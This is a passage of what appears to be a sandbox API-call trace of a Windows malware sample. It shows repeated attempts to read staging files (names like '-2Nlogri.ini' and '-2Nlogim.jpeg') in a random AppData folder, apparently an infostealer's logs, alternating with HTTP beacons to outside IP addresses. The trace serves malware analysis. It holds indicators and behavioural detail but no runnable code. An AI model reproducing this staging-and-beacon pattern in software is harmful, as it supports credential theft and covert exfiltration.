DirectoryInfo=0x0) returned 1 [0223.526] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.526] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0223.526] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.526] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.526] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.526] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0223.526] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.526] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.526] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.526] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0223.526] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.526] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.526] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.526] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0223.526] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.526] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.526] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.526] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0223.526] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.526] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.527] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.527] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0223.527] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.527] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.527] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.527] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0223.527] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.527] socket (af=2, type=1, protocol=6) returned 0x2688 [0223.527] connect (s=0x2688, name=0x8883b60*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.212"), namelen=16) returned 0 [0223.708] send (s=0x2688, buf=0xa10808a*, len=172, flags=0) returned 172 [0223.708] setsockopt (s=0x2688, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0223.709] recv (in: s=0x2688, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040) returned -1 [0223.903] closesocket (s=0x2688) returned 0 [0223.903] Sleep (dwMilliseconds=0x7d0) [0223.905] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.905] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.905] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0223.905] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.905] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.905] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.905] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0223.905] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.905] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.905] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.906] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0223.906] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.906] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.906] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.906] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0223.906] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.906] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.906] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.906] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0223.906] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.906] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.906] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.906] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0223.906] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.906] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.906] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.907] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0223.907] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.907] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.907] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.907] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0223.907] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.907] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.907] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.907] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0223.907] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.907] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.907] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.907] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0223.908] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.908] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.908] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.908] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0223.909] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.909] socket (af=2, type=1, protocol=6) returned 0x2688 [0223.909] connect (s=0x2688, name=0x8884860*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0223.929] send (s=0x2688, buf=0xa10808a*, len=166, flags=0) returned 166 [0223.929] setsockopt (s=0x2688, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0223.929] recv (in: s=0x2688, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 477 [0224.068] closesocket (s=0x2688) returned 0 [0224.068] Sleep (dwMilliseconds=0x7d0) [0224.070] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.070] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, 